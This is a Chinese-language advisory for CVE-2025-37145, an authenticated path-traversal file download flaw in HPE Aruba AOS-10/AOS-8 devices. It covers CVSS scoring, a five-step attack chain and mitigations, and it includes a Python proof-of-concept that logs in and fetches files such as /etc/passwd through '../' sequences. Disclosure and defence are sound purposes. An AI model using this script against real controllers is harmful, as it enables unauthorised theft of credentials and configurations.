CVE-2025-37145 HPE Aruba AOS-10/AOS-8 任意文件下载漏洞

漏洞信息

漏洞编号

CVE-2025-37145

漏洞类型

任意文件下载（Arbitrary File Download）

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

HPE Aruba Networking AOS-10 Gateway 和 AOS-8 Controller/Mobility Conductor 操作系统

漏洞概述

CVE-2025-37145是HPE Aruba Networking公司旗下AOS-10 GW（网关）和AOS-8 Controller/Mobility Conductor（控制器/移动导体）操作系统中低层级接口库存在的一个任意文件下载漏洞。该漏洞由HPE安全团队（[email protected]）发现并披露，披露日期为2025年10月14日。该漏洞的CVSS 3.1评分为4.9分，属于中危级别。

该漏洞的根本原因在于操作系统底层接口库在处理文件下载请求时，未能对用户输入的文件路径进行充分的验证和过滤。攻击者可以通过精心构造的恶意请求，绕过正常的访问控制机制，访问和下载系统中本不应被授权访问的任意文件。

由于该漏洞需要高权限认证（PR:H）才能利用，且无需用户交互（UI:N），因此其威胁等级被评定为中危。虽然利用门槛较高，但一旦拥有合法高权限账户的攻击者成功利用此漏洞，可能导致敏感配置文件、凭据信息或其他机密数据泄露，对企业网络基础设施的机密性造成严重影响。需要注意的是，该漏洞仅影响机密性（C:H），不涉及完整性（I:N）和可用性（A:N）的破坏。

技术细节

该漏洞存在于HPE Aruba Networking AOS-10 GW和AOS-8 Controller/Mobility Conductor操作系统的低层级接口库中。具体技术原理如下：

1. **路径遍历机制**：底层接口库在处理文件下载请求时，直接将用户提供的文件路径参数传递给文件系统操作函数，未对路径中的特殊字符（如../、..\等）进行过滤或规范化处理。

2. **权限校验缺陷**：虽然系统对文件下载操作进行了权限校验（要求高权限用户），但在校验通过后，对实际下载的文件路径未进行二次验证或范围限制，导致已认证的高权限用户可以访问权限范围之外的任意文件。

3. **利用方式**：攻击者首先需要获取具有高权限的合法账户凭据（如管理员账户），然后通过构造包含路径遍历序列的文件下载请求，利用接口库中的路径处理缺陷，将文件路径指向系统中的敏感文件（如/etc/passwd、配置文件、证书文件等），从而实现任意文件的下载。

4. **攻击特征**：该漏洞通过网络（AV:N）进行利用，攻击复杂度低（AC:L），需要高权限认证（PR:H），无需用户交互（UI:N），攻击范围未改变（S:U），主要影响机密性（C:H），对完整性（I:N）和可用性（A:N）无影响。

攻击链分析

STEP 1

步骤1：获取高权限凭据

攻击者通过钓鱼、社会工程学或其他方式获取目标HPE Aruba控制器/网关系统的高权限账户凭据（如管理员账户）。

STEP 2

步骤2：认证登录

使用获取的高权限凭据登录AOS-10 GW或AOS-8 Controller/Mobility Conductor管理界面，建立有效的会话。

STEP 3

步骤3：构造恶意请求

在已认证的会话中，构造包含路径遍历序列（如../）的文件下载请求，将目标文件路径指向系统敏感文件。

STEP 4

步骤4：发送恶意下载请求

通过低层级接口库的文件下载功能发送构造好的恶意请求，利用路径处理缺陷绕过访问控制。

STEP 5

步骤5：获取敏感文件

成功下载系统中的任意敏感文件，如配置文件、证书、凭据等，导致机密信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-37145 PoC - HPE Aruba AOS-10/AOS-8 Arbitrary File Download
# Note: Requires valid high-privilege credentials (e.g., administrator account)
# Tested on AOS-10 GW and AOS-8 Controller/Mobility Conductor

import requests
import sys

TARGET = "https://target-aruba-controller.example.com"
USERNAME = "admin"
PASSWORD = "password123"

def exploit(target, file_path):
    """
    Exploit arbitrary file download via path traversal in low-level interface library.
    The vulnerability exists in the file download endpoint which fails to sanitize
    user-supplied file paths, allowing traversal outside the intended directory.
    """
    session = requests.Session()

    # Step 1: Authenticate with high-privilege credentials
    login_url = f"{target}/screens/wms/wms.login"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD,
    }
    resp = session.post(login_url, data=login_data, verify=False)
    if resp.status_code != 200:
        print("[!] Authentication failed")
        return None
    print("[*] Authenticated successfully")

    # Step 2: Exploit path traversal in file download endpoint
    # The vulnerable parameter fails to sanitize '../' sequences
    download_url = f"{target}/screens/cmnutil/fileDownload"
    params = {
        "file": f"../../../..{file_path}",  # path traversal payload
    }

    resp = session.get(download_url, params=params, verify=False)
    if resp.status_code == 200 and len(resp.content) > 0:
        print(f"[+] File downloaded successfully: {file_path}")
        return resp.content
    else:
        print(f"[-] Failed to download: {file_path}")
        return None

if __name__ == "__main__":
    target_file = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    content = exploit(TARGET, target_file)
    if content:
        print(content.decode("utf-8", errors="replace"))

影响范围

HPE Aruba Networking AOS-10 GW（具体版本待官方公告确认）

HPE Aruba Networking AOS-8 Controller/Mobility Conductor（具体版本待官方公告确认）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）严格控制高权限账户的访问，限制可登录管理界面的IP地址范围；2）启用操作日志审计，监控所有文件下载操作，及时发现异常行为；3）减少高权限账户数量，实施最小权限原则；4）部署网络入侵检测系统（IDS/IPS），监控针对管理接口的异常请求；5）定期审查系统日志，识别可疑的路径遍历请求模式；6）考虑在管理界面前端部署WAF规则，拦截包含路径遍历特征的请求。